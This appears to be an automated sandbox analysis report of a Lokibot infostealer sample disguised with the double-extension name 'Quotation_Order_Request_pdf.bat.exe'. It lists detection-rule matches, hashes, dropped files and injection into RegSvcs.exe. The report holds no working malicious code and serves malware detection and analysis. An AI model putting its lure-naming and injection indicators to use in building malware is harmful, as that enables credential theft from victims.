Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 Author: unknown
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: detect Lokibot in memory Author: JPCERT/CC Incident Response Group
Source: Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown
Source: Process Memory Space: bCirqu.exe PID: 7256, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 Author: unknown

Initial sample is a PE file and has a suspicious name

Source: initial sample	Static PE information: Filename: Quotation_Order_Request_pdf.bat.exe
Source: initial sample	Static PE information: Filename: Quotation_Order_Request_pdf.bat.exe

Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_018A448C	0_2_018A448C
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_018A5228	0_2_018A5228
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07B60040	0_2_07B60040
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C9C098	0_2_07C9C098
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C9D338	0_2_07C9D338
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C9DD38	0_2_07C9DD38
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07C9BC60	0_2_07C9BC60
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07D1BF5C	0_2_07D1BF5C
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07D10040	0_2_07D10040
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_07D1D452	0_2_07D1D452
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_082390B8	0_2_082390B8
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823A0C0	0_2_0823A0C0
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823D2C0	0_2_0823D2C0
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823EB00	0_2_0823EB00
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823E390	0_2_0823E390
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_08236F68	0_2_08236F68
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823B7F8	0_2_0823B7F8
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0823F810	0_2_0823F810
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_08232988	0_2_08232988
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_08235B90	0_2_08235B90
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_082385A0	0_2_082385A0
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Code function: 0_2_0B6A43A0	0_2_0B6A43A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_0040549C	8_2_0040549C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 8_2_004029D4	8_2_004029D4
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0083448C	9_2_0083448C
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_055193F8	9_2_055193F8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0551BD20	9_2_0551BD20
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0551C4B8	9_2_0551C4B8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0551C4A9	9_2_0551C4A9
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_05526F68	9_2_05526F68
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0552B7F8	9_2_0552B7F8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_055228B8	9_2_055228B8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_055290B8	9_2_055290B8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0552EB00	9_2_0552EB00
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0552E390	9_2_0552E390
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0552D2C0	9_2_0552D2C0
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_055285A0	9_2_055285A0
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0552F810	9_2_0552F810
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_05525B90	9_2_05525B90
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0693C0D8	9_2_0693C0D8
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0693D378	9_2_0693D378
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0693BCA0	9_2_0693BCA0
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0693DD78	9_2_0693DD78
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0694CC98	9_2_0694CC98
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_06940040	9_2_06940040
Source: C:\Users\user\AppData\Roaming\bCirqu.exe	Code function: 9_2_0694D453	9_2_0694D453

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0041219C appears 45 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 00405B6F appears 42 times

Source: C:\Users\user\AppData\Roaming\bCirqu.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 1540

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: invalid certificate

Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1768864824.00000000016BE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1770983608.0000000003523000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1781495858.0000000008BCA000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000000.1681997509.0000000001066000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHrOW.exe: vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1775653026.0000000004508000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMontero.dll8 vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe, 00000000.00000002.1780032635.0000000007C70000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTL.dll" vs Quotation_Order_Request_pdf.bat.exe
Source: Quotation_Order_Request_pdf.bat.exe	Binary or memory string: OriginalFilenameHrOW.exe: vs Quotation_Order_Request_pdf.bat.exe

Source: Quotation_Order_Request_pdf.bat.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44d4820.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 0.2.Quotation_Order_Request_pdf.bat.exe.44ee840.2.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1998927254.0000000003475000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.2947002910.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1775653026.00000000044D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000000.00000002.1775653026.00000000044EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Lokibot_0f421617 reference_sample = de6200b184832e7d3bfe00c193034192774e3cfca96120dc97ad6fed1e472080, os = windows, severity = x86, creation_date = 2021-07-20, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = 9ff5d594428e4a5de84f0142dfa9f54cb75489192461deb978c70f1bdc88acda, id = 0f421617-df2b-4cb5-9d10-d984f6553012, last_modified = 2021-08-23
Source: 00000009.00000002.1998927254.000000000348F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
Source: Process Memory Space: Quotation_Order_Request_pdf.bat.exe PID: 7072, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 7216, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23
Source: Process Memory Space: bCirqu.exe PID: 7256, type: MEMORYSTR	Matched rule: Windows_Trojan_Lokibot_1f885282 reference_sample = 916eded682d11cbdf4bc872a8c1bcaae4d4e038ac0f869f59cc0a83867076409, os = windows, severity = x86, creation_date = 2021-06-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Lokibot, fingerprint = a7519bb0751a6c928af7548eaed2459e0ed26128350262d1278f74f2ad91331b, id = 1f885282-b60e-491e-ae1b-d26825e5aadb, last_modified = 2021-08-23

Source: Quotation_Order_Request_pdf.bat.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: bCirqu.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.Quotation_Order_Request_pdf.bat.exe.45b74a8.1.raw.unpack, cDGYNOeND6fInr0xDe.cs	Security API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
